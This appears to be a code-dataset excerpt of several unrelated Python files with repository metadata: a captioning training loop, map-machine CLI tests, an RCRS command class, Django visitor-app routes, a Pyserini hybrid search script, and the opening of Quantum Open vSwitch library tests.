if self.encoder is not None:
self.encoder.eval()
batch_time = AverageMeter()
losses = AverageMeter()
top5accs = AverageMeter()
start = time.time()
ground_truth = list() # ground_truth (true captions) for calculating BLEU-4 score
prediction = list() # prediction (predicted captions)
# explicitly disable gradient calculation to avoid CUDA memory error
# solves the issue #57
with torch.no_grad():
# Batches
for i, (imgs, caps, caplens, allcaps) in enumerate(self.val_loader):
# move to device, if available
imgs = imgs.to(self.device)
caps = caps.to(self.device)
caplens = caplens.to(self.device)
# forward encoder
if self.encoder is not None:
imgs = self.encoder(imgs)
# forward decoder
if self.caption_model == 'att2all':
scores, caps_sorted, decode_lengths, alphas, sort_ind = self.decoder(imgs, caps, caplens)
else:
scores, caps_sorted, decode_lengths, sort_ind = self.decoder(imgs, caps, caplens)
# since we decoded starting with <start>, the targets are all words after <start>, up to <end>
targets = caps_sorted[:, 1:]
# remove timesteps that we didn't decode at, or are pads
scores_copy = scores.clone()
scores = pack_padded_sequence(scores, decode_lengths, batch_first = True)[0]
targets = pack_padded_sequence(targets, decode_lengths, batch_first = True)[0]
loss = self.loss_function(scores, targets)
if self.caption_model == 'att2all':
loss += self.tau * ((1. - alphas.sum(dim = 1)) ** 2).mean()
losses.update(loss.item(), sum(decode_lengths))
top5 = accuracy(scores, targets, 5)
top5accs.update(top5, sum(decode_lengths))
batch_time.update(time.time() - start)
start = time.time()
if i % self.print_freq == 0:
print('Validation: [{0}/{1}]\t'
'Batch Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Top-5 Accuracy {top5.val:.3f} ({top5.avg:.3f})\t'.format(i, len(self.val_loader),
batch_time = batch_time,
loss = losses,
top5 = top5accs)
)
allcaps = allcaps[sort_ind]
for j in range(allcaps.shape[0]):
img_caps = allcaps[j].tolist()
img_captions = list(
map(
lambda c: [w for w in c if w not in {self.word_map['<start>'], self.word_map['<pad>']}],
img_caps
)
)
ground_truth.append(img_captions)
_, preds = torch.max(scores_copy, dim = 2)
preds = preds.tolist()
temp_preds = list()
for j, p in enumerate(preds):
temp_preds.append(preds[j][:decode_lengths[j]])
preds = temp_preds
prediction.extend(preds)
assert len(ground_truth) == len(prediction)
metrics = Metrics(ground_truth, prediction, self.rev_word_map)
bleu4 = metrics.belu[3]
cider = metrics.cider
print(
'\n * LOSS - {loss.avg:.3f}, TOP-5 ACCURACY - {top5.avg:.3f}, BLEU-4 - {bleu}, CIDEr - {cider}\n'.format(
loss = losses,
top5 = top5accs,
bleu = bleu4,
cider = cider
)
)
return bleu4
def run_train(self) -> None:
for epoch in range(self.start_epoch, self.epochs):
if self.epochs_since_improvement == 20:
break
if self.epochs_since_improvement > 0 and self.epochs_since_improvement % 8 == 0:
adjust_learning_rate(self.decoder_optimizer, 0.8)
if self.fine_tune_encoder:
adjust_learning_rate(self.encoder_optimizer, 0.8)
self.train(epoch = epoch)
recent_bleu4 = self.validate()
is_best = recent_bleu4 > self.best_bleu4
self.best_bleu4 = max(recent_bleu4, self.best_bleu4)
if not is_best:
self.epochs_since_improvement += 1
print("\nEpochs since last improvement: %d\n" % (self.epochs_since_improvement,))
else:
self.epochs_since_improvement = 0
save_checkpoint(
epoch = epoch,
epochs_since_improvement = self.epochs_since_improvement,
encoder = self.encoder,
decoder = self.decoder,
encoder_optimizer = self.encoder_optimizer,
decoder_optimizer = self.decoder_optimizer,
caption_model = self.caption_model,
bleu4 = recent_bleu4,
is_best = is_best
)
| true
| true
|
790c70b70ca4c956926737136d747698a3c0c9c8
| 4,357
|
py
|
Python
|
tests/test_command_line.py
|
Strubbl/map-machine
|
e2c6f8cd373bc5dba322129112cfa58874a8321b
|
[
"MIT"
] | null | null | null |
tests/test_command_line.py
|
Strubbl/map-machine
|
e2c6f8cd373bc5dba322129112cfa58874a8321b
|
[
"MIT"
] | null | null | null |
tests/test_command_line.py
|
Strubbl/map-machine
|
e2c6f8cd373bc5dba322129112cfa58874a8321b
|
[
"MIT"
] | null | null | null |
"""
Test command line commands.
"""
from pathlib import Path
from subprocess import PIPE, Popen
__author__ = "Sergey Vartanov"
__email__ = "me@enzet.ru"
from xml.etree import ElementTree
from xml.etree.ElementTree import Element
from map_machine.ui.cli import COMMAND_LINES
LOG: bytes = (
b"INFO Constructing ways...\n"
b"INFO Constructing nodes...\n"
b"INFO Drawing ways...\n"
b"INFO Drawing main icons...\n"
b"INFO Drawing extra icons...\n"
b"INFO Drawing texts...\n"
)
def error_run(arguments: list[str], message: bytes) -> None:
"""Run command that should fail and check error message."""
with Popen(["map-machine"] + arguments, stderr=PIPE) as pipe:
_, error = pipe.communicate()
assert pipe.returncode != 0
assert error == message
def run(arguments: list[str], message: bytes) -> None:
"""Run command that should fail and check error message."""
with Popen(["map-machine"] + arguments, stderr=PIPE) as pipe:
_, error = pipe.communicate()
assert pipe.returncode == 0
assert error == message
def test_wrong_render_arguments() -> None:
"""Test `render` command with wrong arguments."""
error_run(
["render", "-z", "17"],
b"CRITICAL Specify either --input, or --boundary-box, or --coordinates "
b"and --size.\n",
)
def test_render() -> None:
"""Test `render` command."""
run(
COMMAND_LINES["render"] + ["--cache", "tests/data"],
LOG + b"INFO Writing output SVG to out/map.svg...\n",
)
with Path("out/map.svg").open(encoding="utf-8") as output_file:
root: Element = ElementTree.parse(output_file).getroot()
# 4 expected elements: `defs`, `rect` (background), `g` (outline),
# `g` (icon), 4 `text` elements (credits).
assert len(root) == 8
assert len(root[3][0]) == 0
assert root.get("width") == "186.0"
assert root.get("height") == "198.0"
def test_render_with_tooltips() -> None:
"""Test `render` command."""
run(
COMMAND_LINES["render_with_tooltips"] + ["--cache", "tests/data"],
LOG + b"INFO Writing output SVG to out/map.svg...\n",
)
with Path("out/map.svg").open(encoding="utf-8") as output_file:
root: Element = ElementTree.parse(output_file).getroot()
# 4 expected elements: `defs`, `rect` (background), `g` (outline),
# `g` (icon), 4 `text` elements (credits).
assert len(root) == 8
assert len(root[3][0]) == 1
assert root[3][0][0].text == "natural: tree"
assert root.get("width") == "186.0"
assert root.get("height") == "198.0"
def test_icons() -> None:
"""Test `icons` command."""
run(
COMMAND_LINES["icons"],
b"INFO Icons are written to out/icons_by_name and out/icons_by_id.\n"
b"INFO Icon grid is written to out/icon_grid.svg.\n"
b"INFO Icon grid is written to doc/grid.svg.\n",
)
assert (Path("out") / "icon_grid.svg").is_file()
assert (Path("out") / "icons_by_name").is_dir()
assert (Path("out") / "icons_by_id").is_dir()
assert (Path("out") / "icons_by_name" / "Röntgen apple.svg").is_file()
assert (Path("out") / "icons_by_id" / "apple.svg").is_file()
def test_mapcss() -> None:
"""Test `mapcss` command."""
run(
COMMAND_LINES["mapcss"],
b"INFO MapCSS 0.2 scheme is written to out/map_machine_mapcss.\n",
)
assert (Path("out") / "map_machine_mapcss").is_dir()
assert (Path("out") / "map_machine_mapcss" / "icons").is_dir()
assert (
Path("out") / "map_machine_mapcss" / "icons" / "apple.svg"
).is_file()
assert (Path("out") / "map_machine_mapcss" / "map_machine.mapcss").is_file()
def test_element() -> None:
"""Test `element` command."""
run(
COMMAND_LINES["element"],
b"INFO Element is written to out/element.svg.\n",
)
assert (Path("out") / "element.svg").is_file()
def test_tile() -> None:
"""Test `tile` command."""
run(
COMMAND_LINES["tile"] + ["--cache", "tests/data"],
LOG + b"INFO Tile is drawn to out/tiles/tile_18_160199_88904.svg.\n"
b"INFO SVG file is rasterized to out/tiles/tile_18_160199_88904.png.\n",
)
assert (Path("out") / "tiles" / "tile_18_160199_88904.svg").is_file()
assert (Path("out") / "tiles" / "tile_18_160199_88904.png").is_file()
| 32.274074
| 80
| 0.614184
|
from pathlib import Path
from subprocess import PIPE, Popen
__author__ = "Sergey Vartanov"
__email__ = "me@enzet.ru"
from xml.etree import ElementTree
from xml.etree.ElementTree import Element
from map_machine.ui.cli import COMMAND_LINES
LOG: bytes = (
b"INFO Constructing ways...\n"
b"INFO Constructing nodes...\n"
b"INFO Drawing ways...\n"
b"INFO Drawing main icons...\n"
b"INFO Drawing extra icons...\n"
b"INFO Drawing texts...\n"
)
def error_run(arguments: list[str], message: bytes) -> None:
with Popen(["map-machine"] + arguments, stderr=PIPE) as pipe:
_, error = pipe.communicate()
assert pipe.returncode != 0
assert error == message
def run(arguments: list[str], message: bytes) -> None:
with Popen(["map-machine"] + arguments, stderr=PIPE) as pipe:
_, error = pipe.communicate()
assert pipe.returncode == 0
assert error == message
def test_wrong_render_arguments() -> None:
error_run(
["render", "-z", "17"],
b"CRITICAL Specify either --input, or --boundary-box, or --coordinates "
b"and --size.\n",
)
def test_render() -> None:
run(
COMMAND_LINES["render"] + ["--cache", "tests/data"],
LOG + b"INFO Writing output SVG to out/map.svg...\n",
)
with Path("out/map.svg").open(encoding="utf-8") as output_file:
root: Element = ElementTree.parse(output_file).getroot()
assert len(root) == 8
assert len(root[3][0]) == 0
assert root.get("width") == "186.0"
assert root.get("height") == "198.0"
def test_render_with_tooltips() -> None:
run(
COMMAND_LINES["render_with_tooltips"] + ["--cache", "tests/data"],
LOG + b"INFO Writing output SVG to out/map.svg...\n",
)
with Path("out/map.svg").open(encoding="utf-8") as output_file:
root: Element = ElementTree.parse(output_file).getroot()
assert len(root) == 8
assert len(root[3][0]) == 1
assert root[3][0][0].text == "natural: tree"
assert root.get("width") == "186.0"
assert root.get("height") == "198.0"
def test_icons() -> None:
run(
COMMAND_LINES["icons"],
b"INFO Icons are written to out/icons_by_name and out/icons_by_id.\n"
b"INFO Icon grid is written to out/icon_grid.svg.\n"
b"INFO Icon grid is written to doc/grid.svg.\n",
)
assert (Path("out") / "icon_grid.svg").is_file()
assert (Path("out") / "icons_by_name").is_dir()
assert (Path("out") / "icons_by_id").is_dir()
assert (Path("out") / "icons_by_name" / "Röntgen apple.svg").is_file()
assert (Path("out") / "icons_by_id" / "apple.svg").is_file()
def test_mapcss() -> None:
run(
COMMAND_LINES["mapcss"],
b"INFO MapCSS 0.2 scheme is written to out/map_machine_mapcss.\n",
)
assert (Path("out") / "map_machine_mapcss").is_dir()
assert (Path("out") / "map_machine_mapcss" / "icons").is_dir()
assert (
Path("out") / "map_machine_mapcss" / "icons" / "apple.svg"
).is_file()
assert (Path("out") / "map_machine_mapcss" / "map_machine.mapcss").is_file()
def test_element() -> None:
run(
COMMAND_LINES["element"],
b"INFO Element is written to out/element.svg.\n",
)
assert (Path("out") / "element.svg").is_file()
def test_tile() -> None:
run(
COMMAND_LINES["tile"] + ["--cache", "tests/data"],
LOG + b"INFO Tile is drawn to out/tiles/tile_18_160199_88904.svg.\n"
b"INFO SVG file is rasterized to out/tiles/tile_18_160199_88904.png.\n",
)
assert (Path("out") / "tiles" / "tile_18_160199_88904.svg").is_file()
assert (Path("out") / "tiles" / "tile_18_160199_88904.png").is_file()
| true
| true
|
790c70dd7b2d68161eee7a1e5b35a2002b99546d
| 816
|
py
|
Python
|
rcrs_core/commands/AKTell.py
|
roborescue/rcrs-core-python
|
9e48e5778ee7ccd524d3f9ba47d23d892e175d66
|
[
"BSD-3-Clause"
] | 1
|
2022-03-11T12:27:29.000Z
|
2022-03-11T12:27:29.000Z
|
rcrs_core/commands/AKTell.py
|
roborescue/rcrs-core-python
|
9e48e5778ee7ccd524d3f9ba47d23d892e175d66
|
[
"BSD-3-Clause"
] | 1
|
2022-01-12T19:57:51.000Z
|
2022-01-12T19:57:51.000Z
|
rcrs_core/commands/AKTell.py
|
roborescue/rcrs-core-python
|
9e48e5778ee7ccd524d3f9ba47d23d892e175d66
|
[
"BSD-3-Clause"
] | null | null | null |
from rcrs_core.commands.Command import Command
from rcrs_core.worldmodel.entityID import EntityID
from rcrs_core.connection import URN
from rcrs_core.connection import RCRSProto_pb2
class AKTell(Command):
def __init__(self, agent_id: EntityID, time: int, message: str) -> None:
super().__init__()
self.urn = URN.Command.AK_TELL
self.agent_id = agent_id
self.message = message.encode('utf-8')
self.time = time
def prepare_cmd(self):
msg = RCRSProto_pb2.MessageProto()
msg.urn = self.urn
msg.components[URN.ComponentControlMSG.AgentID].entityID = self.agent_id.get_value()
msg.components[URN.ComponentControlMSG.Time].intValue = self.time
msg.components[URN.ComponentCommand.Message].rawData = self.message
return msg
| 35.478261
| 92
| 0.708333
|
from rcrs_core.commands.Command import Command
from rcrs_core.worldmodel.entityID import EntityID
from rcrs_core.connection import URN
from rcrs_core.connection import RCRSProto_pb2
class AKTell(Command):
def __init__(self, agent_id: EntityID, time: int, message: str) -> None:
super().__init__()
self.urn = URN.Command.AK_TELL
self.agent_id = agent_id
self.message = message.encode('utf-8')
self.time = time
def prepare_cmd(self):
msg = RCRSProto_pb2.MessageProto()
msg.urn = self.urn
msg.components[URN.ComponentControlMSG.AgentID].entityID = self.agent_id.get_value()
msg.components[URN.ComponentControlMSG.Time].intValue = self.time
msg.components[URN.ComponentCommand.Message].rawData = self.message
return msg
| true
| true
|
790c7255a53b1468fcafec62c1b123a267fb8466
| 782
|
py
|
Python
|
project/urls.py
|
lucasazevedo/visitor-control
|
2daed747f68d04b1bda98bd51fe0876044e1cc54
|
[
"MIT"
] | null | null | null |
project/urls.py
|
lucasazevedo/visitor-control
|
2daed747f68d04b1bda98bd51fe0876044e1cc54
|
[
"MIT"
] | null | null | null |
project/urls.py
|
lucasazevedo/visitor-control
|
2daed747f68d04b1bda98bd51fe0876044e1cc54
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from django.urls import path
from django.contrib.auth import views as auth_views
from dashboard.views import index
from visitantes.views import registrar_visitante, informacoes_visitante, finalizar_visita
urlpatterns = [
path('admin/', admin.site.urls),
path('', index, name='index'),
path('registrar-visitante/', registrar_visitante, name='registrar_visitante'),
path('visitantes/<int:id>/', informacoes_visitante, name='informacoes_visitante'),
path('visitantes/<int:id>/finalizar-visita/', finalizar_visita, name='finalizar_visita'),
path('login/', auth_views.LoginView.as_view(template_name='login.html'), name='login'),
path('logout/', auth_views.LogoutView.as_view(template_name='logout.html'), name='logout'),
]
| 46
| 95
| 0.757033
|
from django.contrib import admin
from django.urls import path
from django.contrib.auth import views as auth_views
from dashboard.views import index
from visitantes.views import registrar_visitante, informacoes_visitante, finalizar_visita
urlpatterns = [
path('admin/', admin.site.urls),
path('', index, name='index'),
path('registrar-visitante/', registrar_visitante, name='registrar_visitante'),
path('visitantes/<int:id>/', informacoes_visitante, name='informacoes_visitante'),
path('visitantes/<int:id>/finalizar-visita/', finalizar_visita, name='finalizar_visita'),
path('login/', auth_views.LoginView.as_view(template_name='login.html'), name='login'),
path('logout/', auth_views.LogoutView.as_view(template_name='logout.html'), name='logout'),
]
| true
| true
|
790c756cda0990da4d1266cee7ef46ccdca9f80f
| 8,453
|
py
|
Python
|
pyserini/hsearch/__main__.py
|
leungjch/pyserini
|
04aa129910adf45266fe93a4d3947cdac2030570
|
[
"Apache-2.0"
] | null | null | null |
pyserini/hsearch/__main__.py
|
leungjch/pyserini
|
04aa129910adf45266fe93a4d3947cdac2030570
|
[
"Apache-2.0"
] | null | null | null |
pyserini/hsearch/__main__.py
|
leungjch/pyserini
|
04aa129910adf45266fe93a4d3947cdac2030570
|
[
"Apache-2.0"
] | null | null | null |
#
# Pyserini: Reproducible IR research with sparse and dense representations
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import argparse
import json
import os
import sys
from tqdm import tqdm
from pyserini.dsearch import SimpleDenseSearcher
from pyserini.query_iterator import get_query_iterator, TopicsFormat
from pyserini.output_writer import get_output_writer, OutputFormat
from pyserini.search import ImpactSearcher, SimpleSearcher
from pyserini.hsearch import HybridSearcher
from pyserini.dsearch.__main__ import define_dsearch_args, init_query_encoder
from pyserini.search.__main__ import define_search_args, set_bm25_parameters
# Fixes this error: "OMP: Error #15: Initializing libomp.a, but found libomp.dylib already initialized."
# https://stackoverflow.com/questions/53014306/error-15-initializing-libiomp5-dylib-but-found-libiomp5-dylib-already-initial
os.environ['KMP_DUPLICATE_LIB_OK'] = 'True'
def define_fusion_args(parser):
parser.add_argument('--alpha', type=float, metavar='num', required=False, default=0.1,
help="alpha for hybrid search")
parser.add_argument('--hits', type=int, required=False, default=10, help='number of hits from dense and sparse')
parser.add_argument('--normalization', action='store_true', required=False, help='hybrid score with normalization')
parser.add_argument('--weight-on-dense', action='store_true', required=False, help='weight on dense part')
def parse_args(parser, commands):
# Divide argv by commands
split_argv = [[]]
for c in sys.argv[1:]:
if c in commands.choices:
split_argv.append([c])
else:
split_argv[-1].append(c)
# Initialize namespace
args = argparse.Namespace()
for c in commands.choices:
setattr(args, c, None)
# Parse each command
parser.parse_args(split_argv[0], namespace=args) # Without command
for argv in split_argv[1:]: # Commands
n = argparse.Namespace()
setattr(args, argv[0], n)
parser.parse_args(argv, namespace=n)
return args
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Conduct a hybrid search on dense+sparse indexes.')
commands = parser.add_subparsers(title='sub-commands')
dense_parser = commands.add_parser('dense')
define_dsearch_args(dense_parser)
sparse_parser = commands.add_parser('sparse')
define_search_args(sparse_parser)
fusion_parser = commands.add_parser('fusion')
define_fusion_args(fusion_parser)
run_parser = commands.add_parser('run')
run_parser.add_argument('--topics', type=str, metavar='topic_name', required=False,
help="Name of topics. Available: msmarco-passage-dev-subset.")
run_parser.add_argument('--hits', type=int, metavar='num', required=False, default=1000, help="Number of hits.")
run_parser.add_argument('--topics-format', type=str, metavar='format', default=TopicsFormat.DEFAULT.value,
help=f"Format of topics. Available: {[x.value for x in list(TopicsFormat)]}")
run_parser.add_argument('--output-format', type=str, metavar='format', default=OutputFormat.TREC.value,
help=f"Format of output. Available: {[x.value for x in list(OutputFormat)]}")
run_parser.add_argument('--output', type=str, metavar='path', required=False, help="Path to output file.")
run_parser.add_argument('--max-passage', action='store_true',
default=False, help="Select only max passage from document.")
run_parser.add_argument('--max-passage-hits', type=int, metavar='num', required=False, default=100,
help="Final number of hits when selecting only max passage.")
run_parser.add_argument('--max-passage-delimiter', type=str, metavar='str', required=False, default='#',
help="Delimiter between docid and passage id.")
run_parser.add_argument('--batch-size', type=int, metavar='num', required=False,
default=1, help="Specify batch size to search the collection concurrently.")
run_parser.add_argument('--threads', type=int, metavar='num', required=False,
default=1, help="Maximum number of threads to use.")
args = parse_args(parser, commands)
query_iterator = get_query_iterator(args.run.topics, TopicsFormat(args.run.topics_format))
topics = query_iterator.topics
query_encoder = init_query_encoder(args.dense.encoder,
args.dense.tokenizer,
args.run.topics,
args.dense.encoded_queries,
args.dense.device,
args.dense.query_prefix)
if os.path.exists(args.dense.index):
# create searcher from index directory
dsearcher = SimpleDenseSearcher(args.dense.index, query_encoder)
else:
# create searcher from prebuilt index name
dsearcher = SimpleDenseSearcher.from_prebuilt_index(args.dense.index, query_encoder)
if not dsearcher:
exit()
if os.path.exists(args.sparse.index):
# create searcher from index directory
if args.sparse.impact:
ssearcher = ImpactSearcher(args.sparse.index, args.sparse.encoder, args.sparse.min_idf)
else:
ssearcher = SimpleSearcher(args.sparse.index)
else:
# create searcher from prebuilt index name
if args.sparse.impact:
ssearcher = ImpactSearcher.from_prebuilt_index(args.sparse.index, args.sparse.encoder, args.sparse.min_idf)
else:
ssearcher = SimpleSearcher.from_prebuilt_index(args.sparse.index)
if not ssearcher:
exit()
set_bm25_parameters(ssearcher, args.sparse.index, args.sparse.k1, args.sparse.b)
if args.sparse.language != 'en':
ssearcher.set_language(args.sparse.language)
hsearcher = HybridSearcher(dsearcher, ssearcher)
if not hsearcher:
exit()
# build output path
output_path = args.run.output
print(f'Running {args.run.topics} topics, saving to {output_path}...')
tag = 'hybrid'
output_writer = get_output_writer(output_path, OutputFormat(args.run.output_format), 'w',
max_hits=args.run.hits, tag=tag, topics=topics,
use_max_passage=args.run.max_passage,
max_passage_delimiter=args.run.max_passage_delimiter,
max_passage_hits=args.run.max_passage_hits)
with output_writer:
batch_topics = list()
batch_topic_ids = list()
for index, (topic_id, text) in enumerate(tqdm(query_iterator, total=len(topics.keys()))):
if args.run.batch_size <= 1 and args.run.threads <= 1:
hits = hsearcher.search(text, args.fusion.hits, args.run.hits, args.fusion.alpha, args.fusion.normalization, args.fusion.weight_on_dense)
results = [(topic_id, hits)]
else:
batch_topic_ids.append(str(topic_id))
batch_topics.append(text)
if (index + 1) % args.run.batch_size == 0 or \
index == len(topics.keys()) - 1:
results = hsearcher.batch_search(
batch_topics, batch_topic_ids, args.fusion.hits, args.run.hits, args.run.threads,
args.fusion.alpha, args.fusion.normalization, args.fusion.weight_on_dense)
results = [(id_, results[id_]) for id_ in batch_topic_ids]
batch_topic_ids.clear()
batch_topics.clear()
else:
continue
for topic, hits in results:
output_writer.write(topic, hits)
results.clear()
| 45.691892
| 153
| 0.655507
|
import argparse
import json
import os
import sys
from tqdm import tqdm
from pyserini.dsearch import SimpleDenseSearcher
from pyserini.query_iterator import get_query_iterator, TopicsFormat
from pyserini.output_writer import get_output_writer, OutputFormat
from pyserini.search import ImpactSearcher, SimpleSearcher
from pyserini.hsearch import HybridSearcher
from pyserini.dsearch.__main__ import define_dsearch_args, init_query_encoder
from pyserini.search.__main__ import define_search_args, set_bm25_parameters
os.environ['KMP_DUPLICATE_LIB_OK'] = 'True'
def define_fusion_args(parser):
parser.add_argument('--alpha', type=float, metavar='num', required=False, default=0.1,
help="alpha for hybrid search")
parser.add_argument('--hits', type=int, required=False, default=10, help='number of hits from dense and sparse')
parser.add_argument('--normalization', action='store_true', required=False, help='hybrid score with normalization')
parser.add_argument('--weight-on-dense', action='store_true', required=False, help='weight on dense part')
def parse_args(parser, commands):
split_argv = [[]]
for c in sys.argv[1:]:
if c in commands.choices:
split_argv.append([c])
else:
split_argv[-1].append(c)
args = argparse.Namespace()
for c in commands.choices:
setattr(args, c, None)
parser.parse_args(split_argv[0], namespace=args)
for argv in split_argv[1:]:
n = argparse.Namespace()
setattr(args, argv[0], n)
parser.parse_args(argv, namespace=n)
return args
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Conduct a hybrid search on dense+sparse indexes.')
commands = parser.add_subparsers(title='sub-commands')
dense_parser = commands.add_parser('dense')
define_dsearch_args(dense_parser)
sparse_parser = commands.add_parser('sparse')
define_search_args(sparse_parser)
fusion_parser = commands.add_parser('fusion')
define_fusion_args(fusion_parser)
run_parser = commands.add_parser('run')
run_parser.add_argument('--topics', type=str, metavar='topic_name', required=False,
help="Name of topics. Available: msmarco-passage-dev-subset.")
run_parser.add_argument('--hits', type=int, metavar='num', required=False, default=1000, help="Number of hits.")
run_parser.add_argument('--topics-format', type=str, metavar='format', default=TopicsFormat.DEFAULT.value,
help=f"Format of topics. Available: {[x.value for x in list(TopicsFormat)]}")
run_parser.add_argument('--output-format', type=str, metavar='format', default=OutputFormat.TREC.value,
help=f"Format of output. Available: {[x.value for x in list(OutputFormat)]}")
run_parser.add_argument('--output', type=str, metavar='path', required=False, help="Path to output file.")
run_parser.add_argument('--max-passage', action='store_true',
default=False, help="Select only max passage from document.")
run_parser.add_argument('--max-passage-hits', type=int, metavar='num', required=False, default=100,
help="Final number of hits when selecting only max passage.")
run_parser.add_argument('--max-passage-delimiter', type=str, metavar='str', required=False, default='#',
help="Delimiter between docid and passage id.")
run_parser.add_argument('--batch-size', type=int, metavar='num', required=False,
default=1, help="Specify batch size to search the collection concurrently.")
run_parser.add_argument('--threads', type=int, metavar='num', required=False,
default=1, help="Maximum number of threads to use.")
args = parse_args(parser, commands)
query_iterator = get_query_iterator(args.run.topics, TopicsFormat(args.run.topics_format))
topics = query_iterator.topics
query_encoder = init_query_encoder(args.dense.encoder,
args.dense.tokenizer,
args.run.topics,
args.dense.encoded_queries,
args.dense.device,
args.dense.query_prefix)
if os.path.exists(args.dense.index):
dsearcher = SimpleDenseSearcher(args.dense.index, query_encoder)
else:
dsearcher = SimpleDenseSearcher.from_prebuilt_index(args.dense.index, query_encoder)
if not dsearcher:
exit()
if os.path.exists(args.sparse.index):
if args.sparse.impact:
ssearcher = ImpactSearcher(args.sparse.index, args.sparse.encoder, args.sparse.min_idf)
else:
ssearcher = SimpleSearcher(args.sparse.index)
else:
if args.sparse.impact:
ssearcher = ImpactSearcher.from_prebuilt_index(args.sparse.index, args.sparse.encoder, args.sparse.min_idf)
else:
ssearcher = SimpleSearcher.from_prebuilt_index(args.sparse.index)
if not ssearcher:
exit()
set_bm25_parameters(ssearcher, args.sparse.index, args.sparse.k1, args.sparse.b)
if args.sparse.language != 'en':
ssearcher.set_language(args.sparse.language)
hsearcher = HybridSearcher(dsearcher, ssearcher)
if not hsearcher:
exit()
output_path = args.run.output
print(f'Running {args.run.topics} topics, saving to {output_path}...')
tag = 'hybrid'
output_writer = get_output_writer(output_path, OutputFormat(args.run.output_format), 'w',
max_hits=args.run.hits, tag=tag, topics=topics,
use_max_passage=args.run.max_passage,
max_passage_delimiter=args.run.max_passage_delimiter,
max_passage_hits=args.run.max_passage_hits)
with output_writer:
batch_topics = list()
batch_topic_ids = list()
for index, (topic_id, text) in enumerate(tqdm(query_iterator, total=len(topics.keys()))):
if args.run.batch_size <= 1 and args.run.threads <= 1:
hits = hsearcher.search(text, args.fusion.hits, args.run.hits, args.fusion.alpha, args.fusion.normalization, args.fusion.weight_on_dense)
results = [(topic_id, hits)]
else:
batch_topic_ids.append(str(topic_id))
batch_topics.append(text)
if (index + 1) % args.run.batch_size == 0 or \
index == len(topics.keys()) - 1:
results = hsearcher.batch_search(
batch_topics, batch_topic_ids, args.fusion.hits, args.run.hits, args.run.threads,
args.fusion.alpha, args.fusion.normalization, args.fusion.weight_on_dense)
results = [(id_, results[id_]) for id_ in batch_topic_ids]
batch_topic_ids.clear()
batch_topics.clear()
else:
continue
for topic, hits in results:
output_writer.write(topic, hits)
results.clear()
| true
| true
|
790c756cf18615f4e523d293f14c696d95a09f44
| 14,175
|
py
|
Python
|
quantum/tests/unit/openvswitch/test_ovs_lib.py
|
hyunsun/quantum
|
40c4ec9495d05620a3cced4cc2bb98d7f6e52bbb
|
[
"Apache-2.0"
] | 1
|
2021-04-18T15:23:19.000Z
|
2021-04-18T15:23:19.000Z
|
quantum/tests/unit/openvswitch/test_ovs_lib.py
|
hyunsun/quantum
|
40c4ec9495d05620a3cced4cc2bb98d7f6e52bbb
|
[
"Apache-2.0"
] | null | null | null |
quantum/tests/unit/openvswitch/test_ovs_lib.py
|
hyunsun/quantum
|
40c4ec9495d05620a3cced4cc2bb98d7f6e52bbb
|
[
"Apache-2.0"
] | null | null | null |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012, Nicira, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# @author: Dan Wendlandt, Nicira, Inc.
import mox
from quantum.agent.linux import ovs_lib, utils
from quantum.openstack.common import uuidutils
from quantum.tests import base
class OVS_Lib_Test(base.BaseTestCase):
"""
A test suite to excercise the OVS libraries shared by Quantum agents.
Note: these tests do not actually execute ovs-* utilities, and thus
can run on any system. That does, however, limit their scope.
"""
def setUp(self):
super(OVS_Lib_Test, self).setUp()
self.BR_NAME = "br-int"
self.TO = "--timeout=2"
self.mox = mox.Mox()
self.root_helper = 'sudo'
self.br = ovs_lib.OVSBridge(self.BR_NAME, self.root_helper)
self.mox.StubOutWithMock(utils, "execute")
self.addCleanup(self.mox.UnsetStubs)
def test_vifport(self):
"""create and stringify vif port, confirm no exceptions"""
self.mox.ReplayAll()
pname = "vif1.0"
ofport = 5
vif_id = uuidutils.generate_uuid()
mac = "ca:fe:de:ad:be:ef"
# test __init__
port = ovs_lib.VifPort(pname, ofport, vif_id, mac, self.br)
self.assertEqual(port.port_name, pname)
self.assertEqual(port.ofport, ofport)
self.assertEqual(port.vif_id, vif_id)
self.assertEqual(port.vif_mac, mac)
self.assertEqual(port.switch.br_name, self.BR_NAME)
# test __str__
foo = str(port)
self.mox.VerifyAll()
def test_reset_bridge(self):
utils.execute(["ovs-vsctl", self.TO, "--",
"--if-exists", "del-br", self.BR_NAME],
root_helper=self.root_helper)
utils.execute(["ovs-vsctl", self.TO, "add-br", self.BR_NAME],
root_helper=self.root_helper)
self.mox.ReplayAll()
self.br.reset_bridge()
self.mox.VerifyAll()
def test_delete_port(self):
pname = "tap5"
utils.execute(["ovs-vsctl", self.TO, "--", "--if-exists",
"del-port", self.BR_NAME, pname],
root_helper=self.root_helper)
self.mox.ReplayAll()
self.br.delete_port(pname)
self.mox.VerifyAll()
def test_add_flow(self):
ofport = "99"
vid = 4000
lsw_id = 18
utils.execute(["ovs-ofctl", "add-flow", self.BR_NAME,
"hard_timeout=0,idle_timeout=0,"
"priority=2,dl_src=ca:fe:de:ad:be:ef"
",actions=strip_vlan,output:0"],
root_helper=self.root_helper)
utils.execute(["ovs-ofctl", "add-flow", self.BR_NAME,
"hard_timeout=0,idle_timeout=0,"
"priority=1,actions=normal"],
root_helper=self.root_helper)
utils.execute(["ovs-ofctl", "add-flow", self.BR_NAME,
"hard_timeout=0,idle_timeout=0,"
"priority=2,actions=drop"],
root_helper=self.root_helper)
utils.execute(["ovs-ofctl", "add-flow", self.BR_NAME,
"hard_timeout=0,idle_timeout=0,"
